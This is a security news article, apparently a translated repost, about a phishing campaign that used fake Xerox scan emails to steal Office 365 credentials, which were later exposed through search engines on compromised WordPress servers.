Friday, February 26, 03:54
Home security Microsoft Office 365 employee passwords leaked online!

Microsoft Office 365 employee passwords leaked online!

A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to more than a thousand corporate employees.

The cyber-attack is said to have taken place in August last year, targeting energy and construction companies, Check Point Research researchers said today in a joint analysis with industrial security company Otorio.

Microsoft Office 365 phishing credentials

Although phishing campaigns designed to steal credentials are among the most common reasons for data breaches, what makes this mode to stand out is a functional failure that led hackers to inadvertently expose the credentials they had stolen on Internet.

"With a simple Google search, anyone could find the password of a compromised email," the researchers said.

The attack started with phishing supposedly Xerox (or Xeros) scan alerts containing an attachment HTML file, which when opened, encouraged them users to enter their Office 365 passwords on a fake login page. The passwords were then extracted and sent to one remote server in a text file.

The researchers noted that the JavaScript code for exfiltrating of credentials was constantly corrected and refined to the point of avoiding most antivirus and creating a "realistic" user experience to victims provide their login details.

To this end, the campaign was based on a combination of specialized infrastructure, as well as compromised servers WordPress used by attackers to store credentials.

The fact that stolen credentials were stored in specific text files on these servers also means that search engines like Google can register these pages and make them accessible to anyone malicious looking for stolen passwords with an easy search.

In addition, by analyzing the different email headers used in this campaign, the researchers came up with the conclusion that the emails were sent from a Linux server hosted on the Microsoft Azure platform.

To mitigate these threats, users are advised to be wary of emails received from unknown senders and not to click on suspicious links.

Source of information: thehackernews.com

LEAVE ANSWER

Please enter your comment!
Please enter your name here

Teo Ehc
Teo Ehchttps://www.secnews.gr
Be the limited edition.

LIVE NEWS

Wear OS: The phrase "OK Google" has not worked for months

The Wear OS smartwatch suddenly stopped responding to the "OK Google" command, do not worry you are not the only one experiencing this ...

Telegram: Automatically deletes messages with a timer

Telegram releases a new update for the iOS and Android application that brings features such as automatic deletion of messages, chat widget ...

Google is funding two developers to focus on Linux security

Linux is more secure than most operating systems, but that does not mean that its security can be taken for granted ....

AI can write a university paper in 20 minutes

AI can do many things extremely well. Something that can do relatively well is to write a university ...

Kali Linux 2021.1 has been released with new features!

Kali Linux closed last year with the release of v2020.4. The manufacturer Offensive Security has now announced a new ...

NASA's Perseverance sends new image from landing on Mars

One of the most important achievements in space exploration in recent years is the landing of the Perseverance rover on its surface ...

Google: Switch to the new Pay app to access it

Last year, the Google Pay application released a new updated interface, however many users did not choose it and remained in the old one, since they had ...

US Federal Reserve: Where does the shutdown come from?

On February 24, the US Federal Reserve (FED) suffered extensive interruptions in many of its payment services, including a system in which ...

USA: SolarWinds hackers "hit" NASA and FAA!

NASA and the US Federal Aviation Administration (FAA) have been cyber-attacked by hackers who "hit" SolarWinds, according to a report ...

Australia: Facebook and Google will pay for the news

We have recently witnessed a dispute between Facebook and Australia over news content on the platform. And...